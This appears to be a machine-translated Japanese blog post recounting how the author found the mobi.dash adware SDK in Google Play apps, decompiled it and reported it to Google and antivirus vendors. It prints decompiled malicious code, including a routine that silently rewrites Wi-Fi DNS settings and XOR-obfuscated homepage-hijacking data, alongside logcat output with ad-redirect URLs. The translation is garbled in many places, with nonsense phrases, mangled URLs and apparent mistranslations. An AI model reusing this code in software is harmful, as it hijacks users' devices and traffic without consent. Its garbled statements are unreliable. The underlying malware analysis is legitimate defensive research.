🤟 ⛺️ 🧞 Google Playでアドウェアに苦労して負けた方法 👨‍👧‍👧 👲🏽 👩🏾‍🤝‍👩🏻

過去1日間、数百のニュースサイト（クラックおよびタイツ）が、Google Playでの次の悪意のあるアプリケーションの発見について伝える1つの興味深いニュースを再版しています。今回、デバイスのロックが解除され、数十億の携帯電話やタブレットにインストールされるたびに、アドウェアは迷惑な広告を表示しました。幸いなことに、ウイルス対策会社のアバストは時間内に脅威を検出し、アプリケーションは削除されました。

カットの下で、イベントのバージョンを説明します.Google Playでアドウェアを計算して検索した方法、アドウェアSDKコードを逆コンパイルした方法、Googleサポートからの回答を待つことができるか、モバイルウイルス対策が役に立たない理由、ホットインフォメーションラインで優れた無料広告を作成する方法について説明します。

「お使いのAndroidのバージョンは古くなっています」

ある夜、私のより人道主義的で美しい半分の人が、電話が絶えずそれを要求しているのに、なぜ彼女は電話にアップデートをインストールできなかったのかと尋ねてきました。ブラウザのタブが画面上に開かれ、この更新プログラムをまだインストールするように誘われました。タブを閉じると、ブラウザで80以上のページが開かれていることがわかりました。短い尋問の後、彼らは実際に電話に疑わしいアプリケーションをインストールしていないことが判明しました-サードパーティのソースからインストールするオプションは設定で無効にさえされました。結局のところ、携帯電話のロックが解除されるたびに、ランチャー上の広告またはAdMobバナーとのリンクがブラウザーで開かれました。

アプリがGoogle Playから明確に提供されたため、ストーリーは興味深いものになりました。電話を片手に持ち、LogCatをもう一方の手に取り、この広告を実行している人を見つけ始めました。

// TODO：リリースでログを無効化

このイベントの主人公は非常に迅速にインストールされました。結局のところ、開発者はリリースバージョンでのログ記録の無効化をまったく考慮していませんでした。画面をロックまたはロック解除するたびに、LogCatはリクエストの結果に関する詳細情報を広告やその他のデバッグデータのためにサーバーに送りました。このように見えた：

Logcat

01-31 02：15：13.303：D / Microlog（3020）：Microlog 1669935：[DEBUG]-外部URLを開きます。インテントで開始：インテント{act = android.intent.action.VIEW dat = http：//brodero.com/v2/b/rs？Agid = af70e9985-a73c-46d6-a24e-a7e112748cf7＆vid = 3ad864d4-643d-4f55-8dbd -ae76ebf08bbc＆bgid = ba6195268-bfaa-451C-8736-aba9b7449306＆U =のhttp：//terigal.ru/7utq44kvjob6n2rq47av5t9122twv5ob511x1pxpj4q&dyn=xK9dZt_ZDOxeAvvtziYEB32B-KaPEp3_gYayyDZDVS0&sig=eqrEar8HUBLiNU87e0xioQ&ts=1421968510077&m=0 FLG = 0x10000000 CMP = com.android.chrome / com.google.android.apps .chrome.Main}

01-31 02：15：13.306：I / ActivityManager（734）：START u0 {act = android.intent.action.VIEW dat = http：//brodero.com/v2/b/rs？Agid = af70e9985-a73c- 46d6-a24e-a7e112748cf7＆VID = 3ad864d4-643d-4f55-8dbd-ae76ebf08bbc＆bgid = ba6195268-bfaa-451C-8736-aba9b7449306＆U = HTTP：//terigal.ru/7utq44kvjob6n2rq47av5t9122twv5ob511x1pxpj4q&dyn=xK9dZt_ZDOxeAvvtziYEB32B-KaPEp3_gYayyDZDVS0&sig=eqrEar8HUBLiNU87e0xioQ&ts=1421968510077&m=0 FLG = 0x10000000 CMP = com.android.chrome/com.google.android.apps.chrome.Main}から、ディスプレイ0のUID 10065から

意図は、PID 3020でプロセスを開始しました。残ったのは、このPIDがどのパケットに属するかを調べることだけでした。 psコマンド| grep 3020 "はadbシェルで実行されます。私は明確な答えを受け取りました：

adbシェル

シェル@ハンマーヘッド：/ $ ps | grep 3020

ps | grep 3020

u0_a65 3020 195 1534568 66696 ffffffff 00000000 S com.sweet.world.history

World Historyアプリケーションがこの背後にあることが判明しました。アプリケーションには5,000を超えるインストールがあります。また、Google Playから長い間インストールされていましたが、最近広告が流れ始めました。アプリケーションをアンインストールした後、もちろん広告は目障りでなくなりました。

難しいことではありませんでしたが、そのままにしておくことはできません。 APKを詳細に分析して、コードの内部に入ります。

「メス、クランプ...」

ツールについては、新しいことは何も伝えません-dex2jarを使用してjarのコードを取得し、 apktoolを使用してxmlリソースを逆コンパイルします（また、smaliの方法も知っていますが、これはまったく異なる話です）。ちなみに、後者は非常にお勧めです。LuytenはProcyonの GUIであり、非常にクールです。少なくとも前に使用したJDと比較すると、Procyonの方が好きでした。

Androidの開発に精通しているKhabrovskの人々は、アプリケーションがそのようなcな広告を表示するために、イベントandroid.intent.action.SCREEN_OFFおよびandroid.intent.action.SCREEN_ONのブロードキャストレシーバーを明示的に登録することをすでに認識しています。これらのアクションはコードからのみサブスクライブできるため、マニフェストに興味深いものはないはずです。しかし、それでもそこを見てみましょう（最終的に逆コンパイルされたのは無駄ではありませんでした）-マニフェストにはいくつかの興味深いコンポーネントがありました。ブロードキャストレシーバーの1つがandroid.intent.action.BOOT_COMPLETEDにサブスクライブされました。それはmobi.dash.overapp.DisplayCheckRebootReceiverと呼ばれていました -私はそれからコードを勉強し始めました：

DisplayCheckRebootReceiver

public void onReceive(final Context context, final Intent intent) { AdsLog.d("AdsOverappRebootReceiver", intent.toString()); Object stringExtra = null; if (intent != null) { stringExtra = intent.getStringExtra(DisplayCheckRebootReceiver.Param_Event); } if (DisplayCheckRebootReceiver.Event_SendAlive.equals(stringExtra)) { sendAlive(context); return; } AdsOverappRunner.ping(context.getApplicationContext()); }

コードからわかるように、AdsOverappRunner.pingメソッドは最初の再起動後に呼び出されます。指定されたメソッドは、rawフォルダーのリソースにあるads_settings.jsonファイルから設定を読み込み、待機を開始します。そして、この待機が続く時間は、ads_settings.jsonファイルに示されています。その後、すべてが非常に簡単です-これから15分間隔でAlarmManagerを使用すると、アプリケーションは同じDisplayCheckRebootReceiverを取得し、インキュベーション期間が終了したかどうかを確認します。待機が終了すると、 mobi.dash.overapp.DisplayCheckServiceが起動します。これにより、ユーザーはすでに広告で満足しています。

原則として、これまでのところ珍しいことはありません。それが1つの事実でなければ、これはすべてアプリケーションの作成者の仕事ではなく、明らかにサードパーティのSDKでした。さらに、さらなる分析が行われなくても、 mobi.dashパッケージには約200のクラスが含まれていたため、すでに自信が生まれています。

画面がロックされるたびに、SDKはサーバーに要求を行い、表示する価値のある応答で広告を受信しました。同時に、さまざまなタイプの広告がサポートされました。

DisplayCheckService

  public void showAd(final AdsOverappType lastOverappType, final BannerData bannerData) { this.hideAd(); BlacklistManager.getInatance().onBannerShow((Context)this, bannerData.id); Ads.getHistory().addBannerAction(bannerData.localId, "service", "showAd"); this.lastOverappType = lastOverappType; this.saveLastOverappType(); if (lastOverappType == AdsOverappType.Alert) { this.showAlert(bannerData); return; } if (lastOverappType == AdsOverappType.Recommendation) { this.showRecomendation(bannerData); return; } if (lastOverappType == AdsOverappType.Link) { this.showLink(bannerData); return; } if (lastOverappType == AdsOverappType.Sdk) { this.showSdk(bannerData); this.waitAndRequestNextAd(); return; } if (lastOverappType == AdsOverappType.Notification) { this.showNotification(bannerData); this.waitAndRequestNextAd(); return; } this.showBanner(bannerData); this.waitAndRequestNextAd(); }

サーバーからのコマンドで、SDKは指定されたテキストを含むダイアログを表示し、ブラウザーでリンクを開き、AdMob、MopubまたはChartboostからの広告を表示し、通知をスローします。

さらに、より興味深い機能が内部に見つかりました-SDKはwi-fi接続設定でDNSサーバーを巧みに変更しました：

DisplayCheckService

  public static void setupDns(final Context context) { final String dns = getDns(context); if (!TextUtils.isEmpty((CharSequence)dns)) { final WifiManager wifiManager = (WifiManager)context.getSystemService("wifi"); if (wifiManager != null) { final DhcpInfo dhcpInfo = wifiManager.getDhcpInfo(); if (dhcpInfo != null) { final String formatIpAddress = Formatter.formatIpAddress(dhcpInfo.ipAddress); final String formatIpAddress2 = Formatter.formatIpAddress(dhcpInfo.netmask); final String formatIpAddress3 = Formatter.formatIpAddress(dhcpInfo.gateway); final ContentResolver contentResolver = context.getContentResolver(); Settings$System.putString(contentResolver, "wifi_use_static_ip", "1"); Settings$System.putString(contentResolver, "wifi_static_ip", formatIpAddress); Settings$System.putString(contentResolver, "wifi_static_netmask", formatIpAddress2); Settings$System.putString(contentResolver, "wifi_static_gateway", formatIpAddress3); Settings$System.putString(contentResolver, "wifi_static_dns1", dns); Settings$System.putString(contentResolver, "wifi_static_dns2", dns); } } } }

ほとんどの場合、これはユーザーを必要な広告サイトにリダイレクトするために行われました。

また、SDKはデスクトップ上に偽のショートカットを作成し、ユーザーをサーバーからのリンクに誘導しました。さて、おそらく最後の興味深い機能は、ブラウザーのホームページを変更する機能です。これを担当するコードは、SDKで唯一の保護された場所であることが判明しました。他のすべてのものは、置き換えることができますが、難読化さえされていません。ブラウザは異なるため、SDKは3つの異なる方法を使用します。同時に、ホームページを変更するために使用されたコンテンツリゾルバのパスのインテントまたはURIの名前は、暗号化XOR暗号化アルゴリズムで暗号化され、最初はバイト配列のように見えました。

ホームページインジェクター

 a = new byte[] { 13, 9, 1, 37, 14, 25, 55, 75, 27, 24, 29, 6, 11, 90, 94, 16, 29, 25, 89, 3, 0, 0, 93, 58, 54, 32, 58, 58, 97, 4, 11, 3, 21, 6, 9, 45, 49, 38, 32, 32, 62, 55, 107, 59 }; b = new byte[] { 9, 1, 9, 23, 26, 27, 13 };

簡単な操作の後、これはプレーンテキストに変わりました。

Xor

lgeWapService.prov.persister.INSTALL_BROWSER

ホメウリ

そして、そのようなアクションと追加のパラメーターで急いだ放送。 LG携帯電話では、これによりホームページが実際に変更される可能性があります。ほとんどの場合、これはウイルス対策スキャンから保護するために行われました。少なくともvirustotalは、アプリケーションは絶対に安全であると自信を持って述べています。

彼らの名前は軍団です

SDKの外観は非常に優れていたため、5,000のインストールがあるアプリケーションに埋め込むためだけに作成されたとは考えられませんでした。まず、同じ著者の残りのアプリケーションをチェックしました。結局のところ、mobi.dashの広告はそれぞれに組み込まれていました。そして、著者には多くのアプリケーションがありました。

もちろん、基本的に彼らは非常に少数のインストールしかありませんでしたが、そのうちの1つではインストール数が5万を超えていました。しかし、もちろん、このSDKの配布は1つのパブリッシャーに限定されるべきではありません。 SDKはad1.mads.bzサーバーでの広告に使用されたため、この問題に直面している人を探すことにしました。 w3bsit3-dns.comには、ユーザーがそのような広告と戦っているトピック全体が含まれていることがわかりました。そこで、 ad1.mads.bzから広告をプルする2つのアプリケーションへの参照を見つけました。これらのアプリケーションは、はるかに人気があることが判明しました。

500万を超えるインストールと100万を超えるインストール-優れた視聴者のリーチ。非常に多くのインストールがあるカードゲーム「Fool」には、毎日何万人ものアクティブユーザーがいるはずです。レビューにはゲームが広告を表示するという否定的なコメントが多くありましたが、アンチウイルスは何も判断しません。アンチウイルスがAirPush SDKを誓うことを考えると、これはかなり奇妙でした。ところで、私が見つけたmobi.dash sdkの最初の言及は、2013年10月1日までさかのぼります。おそらく、1年半と数百のユーザーからの苦情の後、誰かが行動を起こすべきでしょうか？そのような広告を持っている場合、モバイルウイルス対策ソフトの助けを求めていない場合、普通のユーザーは他に何をすべきか~~（もちろん、ハードアドレス）~~ 。 3つのモバイルウイルス対策ソフトウェアをチェックしました。AvastMobile Security博士。 Webおよびカスペルスキーインターネットセキュリティ。意見は全会一致でした：

誰かがすべてが私の電話で正常であると思った。おそらくこれで何かをする必要があった。

「やめて！」

この時点で、SDKの機能と、それを実行するアプリケーションに関する広範な情報を既に入手しました。したがって、私が最初にしたことは、これについてGoogleに通知する~~ことでし~~た。 Google Playの各アプリケーションの下には、誰もが違反を報告できるクリックをクリックすることで、「不適切なフラグ」リンクがあります（ちなみに、2014年の夏にのみ表示されたわけではありませんでした）。 Googleはこれらの苦情を非常に真剣に受け止めているため、彼がこれをどれほど真剣に受け止めているかについて漫画を描いています。私の苦情のテキスト入力フィールドへの不適切なリンクとしてフラグから簡単ではない方法を通過したので、私は簡潔に全体の要点を概説しました。 1分後、ボットからメールで応答を受け取りました。アプリケーションが違反しているルールを詳細に説明し、それらに役立つ追加の資料（スクリーンショットなど）を添付するように求められました。これに応えて、Google Playコンテンツポリシーの4つの規則に違反していることを説明する長く詳細な手紙を発行しました。

Google Playコンテンツポリシー違反

このアプリは次のポリシーに違反しています。

* Google Playコンテンツポリシー、「システム干渉」の章：

-これには、アプリ、ウィジェット、またはデバイスの設定のデフォルト表示の置換または並べ替えなどの動作が含まれます。アプリがユーザーの知識と同意でこのような変更を行う場合、どのアプリが変更を行ったかをユーザーに明確にし、ユーザーは簡単に変更を元に戻すか、アプリを完全にアンインストールする必要があります。

+ユーザーが悪意のあるサイトにリダイレクトするためにWi-Fiが接続されている場合、アプリはDNSサーバーを変更できます

-アプリとその広告は、ブラウザ設定やブックマークを変更または追加したり、ホーム画面のショートカットを追加したり、サードパーティへのサービスとして、または広告目的でユーザーのデバイスにアイコンを追加したりしてはなりません。

+アプリはブラウザのホームページを変更し、ホーム画面のショートカットを作成できます

-アプリとその広告は、インストールされたアプリ（たとえば、特別な取引をユーザーに通知する航空会社アプリ、またはユーザーに通知するゲーム）によって提供される統合機能に由来する場合を除き、ユーザーのデバイスでシステムレベルの通知を通じて広告を表示してはなりませんゲーム内プロモーションの）。

+アプリは、システムレベルで他のすべてのアプリケーションと重複する広告を表示します

* Google Play広告ポリシー、「広告コンテキスト」の章：

-広告は、アプリのユーザーインターフェース、またはオペレーティングシステムの通知および警告要素をシミュレートまたは偽装してはなりません。各広告がどのアプリに関連付けられているか、どのアプリに実装されているかをユーザーに明確にする必要があります。

+表示される広告はオペレーティングシステムの警告を非常に頻繁にシミュレートし、スクリーンショットが添付されます

完全に理解するために、この広告がどのように見えるかを示すビデオを録画しました。

広告SDKとその機能に関する私の研究を詳細に説明し、アプリケーションのリストも提供しました。日付を翻訳するだけで、広告をすばやく表示する方法について詳細な説明を書きました。手紙は1月22日に私を置き去りにしました。

私はそれに対する答えを受け取らず、Googleから結果を得なかったことに誰も驚かないと思います。残念ながら、Googleでは、Mr。Boxがユーザーからの苦情を処理し、それらは遠方のボックスに入れられます。

アンチウイルス

それでも、アプリケーションがGoogleに残っていても（そして、そのうち140個が存在する場合でも）、アンチウイルスが少なくとも何らかの形でこのSDKについて警告してくれたらいいと思います。アバスト博士のフォーラムでトピックを作成しました WebとKasperskyは、アンチウイルスはそのような広告には一切反応しないと指摘しましたが、とにかくデータベースに追加するのは良いことです。今のところ、それは非常に簡単です。 結局のところ 、そのようなアプリケーションのマニフェストではmobi.dashコンポーネントが宣言されています。フォーラムで、カスペルスキーは非常に迅速に反応し、それを理解することを約束し、さらに年間サブスクリプションを提示しました。フォーラムモデレーター Webは、分析のためにファイルをウイルス対策ラボに送信することを提案しました。アバストは3日後に反応し、整理することを約束しました。フォーラムのトピックでアクティビティがなくなりました。

更新

カスペルスキーは他の先を行っています。約束は守られ、整理されています。記事の公開日現在、カスペルスキーインターネットセキュリティはすでにこの広告モジュールを発見しています。今すぐ発見：

今日、フォーラム投稿の10日後、突然、広告を示すビデオの下にコメントが表示され始めました。これはビデオが非公開だったことを考えると、やや奇妙でした。さらに奇妙なのは、ビデオの再生回数が1万回であるという事実でした（現時点ではすでに2万回を超えています）。アバストがこの広告SDKを使用したアプリケーションに関するブログ記事を投稿したことが判明しました。この記事で私が書いたものを除いて、新しいものは何もありませんでした。ただし、この広告を既に定義しているアバストのプレミアムバージョンのウイルス対策の広告が追加されている点が異なります。どうやら、物語は興味深いことが判明し、プレスリリースが注目を集めました。フォーラムにアプリケーションおよびSDK分析へのリンクを投稿した後、アバストとアナリストのFilip ChitryがGoogle Playで悪意のあるアプリケーションを発見した方法に関するニュースが、多くの大きな情報リソースに到達しました。 ~~そして、ここで会社のアバストとアナリストのフィリップ・キトラは、そう思われます。~~

ブログに投稿してから6時間後に、私が言及したすべてのアプリがGoogle Playから削除されました。

この投稿が公開されてから約6時間後に、Googleの広報担当者が3つのアプリがPlayから削除されたことをメールで知らせました。

ハッピーエンド

私のアドウェアとの闘いは特に何も終わらない-私の苦情はGoogleによって無視され、アバストは救世主であることが判明したが、それでも結果は達成された。確かに、私はこの結果に対して非常に平凡な態度をとっています-Googleにアクセスすることは不可能であることが判明し、アンチウイルスメーカーは1.5年以内にそのような問題に注意を払わなかった場合、モバイル製品の改善にあまり関心がありません。それでも、私はこの物語の結果が将来多くのユーザーの生活を楽にしてくれると信じたいです。

Google Playでアドウェアに苦労して負けた方法